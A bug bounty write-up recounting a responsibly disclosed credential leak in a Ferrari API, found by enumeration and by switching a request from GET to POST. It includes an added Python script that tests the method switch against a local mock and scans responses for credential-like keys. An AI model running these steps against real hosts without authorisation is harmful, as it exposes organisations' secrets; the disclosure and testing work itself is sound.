Hi Leets 👨💻 !
In this blog✍ , I am delighted to recount my journey of achieving a place in the Iconic Brand Ferrari’s Hall of Fame by securing their products and services.
Let's start . . . 🐞
Vulnerability: Sensitive Information Disclosure
Sensitive Information Disclosure is a security 🛠 vulnerability that occurs when sensitive or confidential 👀 data is unintentionally exposed to individuals or systems that are not authorized to see it. It can arise from many sources: insecure configurations, coding errors, inadequate access controls, or weaknesses in network communication protocols. In this case the exposure came from an API endpoint that rejected GET requests but answered a POST with a dump of its configuration. Attackers can use such a leak to obtain credentials and internal details, leading to privacy breaches, identity theft, financial loss, or reputational damage for the individuals or organizations involved.
Steps to Reproduce:
1. Enumerated the subdomains using tools such as amass, subfinder, findomain, assetfinder, etc.
2. Removed the duplicate domains from the above results.
3. Found the live subdomains using httpx or httprobe and selected one subdomain ( https://test.redact.com ).
4. Identified a couple of endpoints; I used dirsearch for this part.
5. Checked each endpoint individually and noted that one of them was not accessible via a GET request (https://test.redact.com/api/consumer/systemsettings).
6. So I intercepted the request using Burp Suite, changed the request method from GET to POST, added a Content-Length header as well, and sent the request.
7. After thoroughly reviewing the response, I was really surprised 😲 that I was able to fetch ♨ sensitive information such as the AzureAuth user ID, AzureAuth password, client IDs, consumer IDs, internal path endpoints and many more. . .
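Steps 5 to 7 above, turned into a repeatable check. This is an added example, not part of the original writeup and not Ferrari's code: the target is a constructed local mock that behaves the way the post describes (GET on `/api/consumer/systemsettings` returns 405, POST returns a JSON settings dump), standing in for the redacted host, and the key names and values in `MOCK_SETTINGS` are fake. The script probes the GET-refusing endpoint with other HTTP methods, flags any that return 200, and lists the keys in the body whose names look like credentials or identifiers. The practitioner's lesson it encodes: a 405 or 404 on GET says nothing about the other verbs, so the method switch should be in every endpoint checklist.

```python
"""
Added example (not from the original writeup): probe an endpoint that refuses
GET with other HTTP methods, then scan any 200 response for credential-like
keys. The vulnerable service is a constructed local mock that mimics the
behaviour described in the post (GET -> 405, POST -> JSON settings dump).
"""
import json
import re
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Path taken from the writeup; the real hostname is replaced by a loopback mock.
VULN_PATH = "/api/consumer/systemsettings"

# Constructed, fake values: only the key names mirror what the writeup says leaked.
MOCK_SETTINGS = {
    "AzureAuthUserId": "svc-app@example.invalid",
    "AzureAuthPassword": "not-a-real-password",
    "ClientId": "00000000-0000-0000-0000-000000000000",
    "ConsumerId": "consumer-1234",
    "InternalEndpoints": ["http://10.0.0.5/internal/api"],
}

# Key names that should never appear in an unauthenticated response.
SENSITIVE_KEY_RE = re.compile(
    r"(password|passwd|secret|token|apikey|api_key|clientid|client_id|"
    r"userid|user_id|connectionstring)",
    re.IGNORECASE,
)


class MockHandler(BaseHTTPRequestHandler):
    """Rejects GET on the settings path but happily serves it on POST."""

    def do_GET(self):
        self.send_error(405 if self.path == VULN_PATH else 404)

    def do_POST(self):
        if self.path != VULN_PATH:
            self.send_error(404)
            return
        body = json.dumps(MOCK_SETTINGS).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_mock_server():
    """Bind the mock on a free loopback port and serve it in a daemon thread."""
    srv = HTTPServer(("127.0.0.1", 0), MockHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(url, method):
    """Send one request with the given method; return (status, body_text)."""
    body = b"" if method in ("POST", "PUT", "PATCH") else None
    req = Request(url, data=body, method=method)
    if body is not None:
        # Explicit Content-Length, as in the Burp repro: some stacks treat a
        # bodiless POST without it as malformed.
        req.add_header("Content-Length", str(len(body)))
    try:
        with urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def find_sensitive_keys(body_text):
    """Return JSON key paths whose names look like credentials or identifiers."""
    try:
        doc = json.loads(body_text)
    except ValueError:
        return []
    hits = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, value in node.items():
                full = f"{path}.{key}" if path else key
                if SENSITIVE_KEY_RE.search(key):
                    hits.append(full)
                walk(value, full)
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, f"{path}[{i}]")

    walk(doc, "")
    return hits


def check_method_tampering(base_url, path, methods=("POST", "PUT", "PATCH")):
    """Steps 5-7 of the writeup: if GET is refused, try the other methods and
    report any that answer 200, with the sensitive keys found in the body."""
    url = base_url.rstrip("/") + path
    get_status, _ = probe(url, "GET")
    findings = {}
    if get_status == 200:
        return get_status, findings  # nothing to bypass
    for method in methods:
        status, body = probe(url, method)
        if status == 200:
            findings[method] = {"status": status, "sensitive_keys": find_sensitive_keys(body)}
    return get_status, findings


if __name__ == "__main__":
    server = start_mock_server()
    base = f"http://127.0.0.1:{server.server_address[1]}"
    get_status, findings = check_method_tampering(base, VULN_PATH)
    print(f"GET {VULN_PATH} -> {get_status}")
    for method, info in findings.items():
        print(f"{method} {VULN_PATH} -> {info['status']}; sensitive keys: {info['sensitive_keys']}")
    server.shutdown()
```

Against a real target you would drop the mock, point `base_url` at the live host from step 3 and feed `check_method_tampering` the endpoint list from step 4. The key-name regex is deliberately broad; a hit is a lead for manual review, not proof of a leak.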
I made an attempt to escalate the vulnerability, but encountered some challenges. Subsequently, I prepared a comprehensive report 📖 and shared it with the appropriate team as a contribution to their Responsible Disclosure Program.
A few days later, the team successfully resolved the issue & acknowledged my contribution by including my name in their Hall of Fame 🌟
Thank you for passing by! 🖐
Happy Hunting! 🐞